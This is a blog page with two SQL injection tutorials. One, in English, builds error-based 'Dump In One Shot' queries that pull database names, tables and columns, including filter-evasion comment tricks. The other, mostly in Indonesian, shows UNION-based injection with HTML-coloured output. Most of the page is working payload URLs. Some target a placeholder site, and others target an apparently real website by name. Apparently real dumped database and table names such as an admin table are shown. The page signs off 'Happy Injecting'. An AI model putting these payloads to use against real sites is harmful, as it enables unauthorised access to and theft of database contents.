Articles by "SQL"



Error Based Dump In One Shot (DIOS) 

We Have Discussed in Our Previous Tutorial About Error Based SQL Injection.
In This Tutorial You Will Learn How To Build Error Based Dump In Shot ( DIOS ) .
As  We Know That in Error Based Query we Give Our Commands To server and it Gives Us result the Under a error .



If We Want to Get the version() then we Give Query Like this.


http://www.FakeSite.com/news.php?id=11 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1-- -
 

we get the version printed on the page. version=5.5.42-cll

Error Based Dump In One Shot - (DIOS)


Now Lets get the Primary Database name.
http://www.FakeSite.com/news.php?id=11 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- -

and Here is our Primary Database.

Error Based Dump In One Shot - (DIOS)
this the Primary Database name "kkbaketo_wordpress" so this is our Primary Database name . if we want to get the other we usually Increase the LIMIT 0,1 to LIMIT 1,1

But we Can Also get all Databases Without Using the LIMIT.
Here Is Our SYNTAX for Getting All Databases.

(SELECT!x-~0.FROM(SELECT(concat(0x3a3a3a,(select group_concat(schema_name) from information_schema.schemata)))x)a)

Now Add this SYNTAX to Get all Databases.

http://www.FakeSite.com/news.php?id=(SELECT!x-~0.FROM(SELECT(concat(0x3a3a3a,(select group_concat(schema_name) from information_schema.schemata)))x)a)-- -


Error Based Dump In One Shot - (DIOS)
and these our Databases.

information_schema,kkbaketo_wordpress

Next step  is to Get The Tables.
Here is The Example.
http://www.FakeSite.com/news.php?id=11 or 1 group by concat_ws(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)) having min(0) or 1-- -
and we Get Table name under Error response ::
Error Based Dump In One Shot - (DIOS)

We Just GOT one TABLE Name. kkbaketop_category

it Was Our First Table name. we Can Get Next one and Then Another by Increasing the Value of LIMIT 0,1 to LIMIT 2,1 LIMIT 3,1
 We Increase the LIMIT for Tables.
LIMIT 0,1 for 1st table.
LIMIT 1,1 for 2nd tables.
As We Know that we Can DUMP All Tables and Columns In UNION BASED injection.
in ERROR BASED Dump in one Shot ( DIOS ) we can not Dump All Tables/Columns as Like UNION BASED Injection.
But We Can Get some Tables/Columns from The Database by BUILDING our Query.


Here is Our SYNTAX For Tables.

(select group_concat(table_name) from information_schema.tables where table_schema=database())

Now add this SYNTAX in our DIOS Query.

(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select group_concat(table_name) from information_schema.tables where table_schema=database())))x)a)


Our DIOS Query is Ready for  Tables.



http://www.FakeSite.com/news.php?id=(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select group_concat(table_name) from information_schema.tables where table_schema=database())))x)a)-- -


Error Based Dump In One Shot - (DIOS)

Here are Our Tables.

kkbaketop_admin,kkbaketop_category,kkbaketop_content,kkbaketop_contentOld,kkbaketop_meta,kkbaketop_navigation,kkbaketop_product

We Can also  HTML TAG to show All Tables in a New Line.
HTML TAG=<BR>
we can use it by encoding it in HEX Value or Putting the Single Quote Before and After the HTML TAG.
HEX Value=3c42523e we have to use 0x before the HEX Value to Use The HTML TAG.
HEX Value=0x3c42523e
Putting Single Quote='<BR>'

PUT The HTML TAG Before The Table_name. 
Hmmm now Lets Add this Tag to our Error Based DIOS Query and execute it.

http://www.FakeSite.com/news.php?id=(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select group_concat('<BR>',table_name) from information_schema.tables where table_schema=database())))x)a)-- -
Error Based Dump In One Shot - (DIOS)
 Now All Tables are in NEW line.

Next Step is we Have to Get Columns.

Here Is The SYNTAX for Columns.

(select group_concat(3c42523e,table_name,0x3a,column_name) from information_schema.columns  where table_schema=database())

Add this SYNTAX in DIOS Query and Execute it for Getting Columns from Each Table.


And Here is the FINAL DIOS Query for Error Based Getting Tables And Columns in one SHOT.


http://www.FakeSite.com/news.php?id=(SELECT!x-~0./*!50000FROM*/(/*!50000SELECT*/(/*!50000concat_ws*/(0x3a3a3a,(select group_concat('<BR>',table_name,0x3a,column_name) from information_schema.columns where table_schema=database())))x)a)-- -


Error Based Dump In One Shot - (DIOS)

You Can Se The Tables And Columns Printed On The ScreenShot.

Hope You like The Tutorial.

Sumber : ECA Team

Kaizen

Tag HTML bisa digunakan Untuk banyak Fun di SQL Queries. Kita bisa menggunakan Tag HTML untuk Membuat Hasil Penuh Warna pada Output. Kadang kita menyuntik situs dan kolom yang rentan ada di judul atau di halaman sumber sehingga kita juga bisa menggunakan tag HTML di sana untuk menampilkan output di halaman.
Jadi Kita Akan Mulai Menambah Tag HTML Untuk membuat Output Beberapa Warna Penuh.
Inilah contohnya. Kami ingin Mencetak Versi dengan Warna Merah Jadi Berikut adalah TAG HTML kami untuk Menampilkan Versi dengan Warna MERAH.
 <font color=red>

Concat(OUR_HTML_TAG,QUERY_HERE)

mari kita lihat hasilnya. Sebelum Melaksanakan Query First Encode HTML TAG di Hex Value atau Use Single Quote Sebelum dan Sesudah Tag HTML Untuk Membuatnya Dapat Dieksekusi

http://www.kimclement.com/basiccal/event.php
?id=-444' UNION SELECT 1,2,3,4,5,6,Concat('<font color=red>',version()),8,9--+



Adding HTML Tags in SQL Queries

Dan Anda bisa Lihat Versi berwarna RED. jika kita ingin menggunakan Diffirent Colors untuk masing-masing Command Like Displaying Version dalam warna Merah , Database dalam warna hijau ,User dalam warna Biru jadi akan menggunakan HTML Tag berbeda untuk setiap tugas.

Lihat contoh
Concat(Version RED Color ,Database in Green Color,User in Blue Color)
HTML Tags For Each Task:
Red color: <font color=red>
Green Color: <font color=green>
Blue Color: <font color=blue>

Jadi Query Final kami Untuk Menampilkan Setiap tugas dalam warna yang berbeda Akan,

Concat(<font color=red>,version(),<font color=green>,database(),<font color=blue>,user())

Contoh :
http://www.kimclement.com/basiccal/event.php
?id=-444' UNION SELECT 1,2,3,4,5,6,Concat('<font color=red>',version(),0x3a,'<font color=green>',database(),0x3a,'<font color=blue>',user()),8,9--+



Adding HTML Tags in SQL Queries

Dan lihat gambar semua Tasks lengkap. Dengan cara ini Anda juga bisa menampilkan Tabel dan Kolom dengan warna yang berbeda.
Setelah Menampilkan Perintah SQLi dalam Warna yang Berbeda.
Sekarang mari kita lihat bagaimana kita dapat menampilkan data ketika Kolom Rentan kita ada di Halaman Sumber atau dalam TTTLE Menggunakan HTML TAGS.

When Vulnerable Column is in Source Page. ?
Concat(STARTING_HTML_TAG,OUR_QUERY,ENDING_HTML_TAG)

jadi kita akan menggunakan HTML TAG ini untuk menampilkan Data pada Halaman jika Kolom Rentan kita ada di halaman Sumber.

HTML TAG:Concat(<font size="8" color="red">,Version(),</font>) 

dan kadang-kadang Kolom Rentan kita ada dalam Judul sehingga dalam hal ini kita akan menggunakan Tag HTML ini untuk Mencetak Data di Webpage

HTML TAG:Concat(</title>,Version())

gunakan Tag HTML ini setelah melakukan pengkodean di Hex Value atau PUT Single Quote sebelum dan sesudah Tag HTML untuk membuat Query Executable.

Happy Injecting :)

Zaenal Arifin

{facebook#https://www.facebook.com/darkvenom.gov} {twitter#https://twitter.com/steviefar07} {google-plus#https://plus.google.com/u/0/117673850650242989379} {youtube#https://www.youtube.com/c/KaizenJavaHaxor}

Contact Form

Name

Email *

Message *

Powered by Blogger.
Javascript DisablePlease Enable Javascript To See All Widget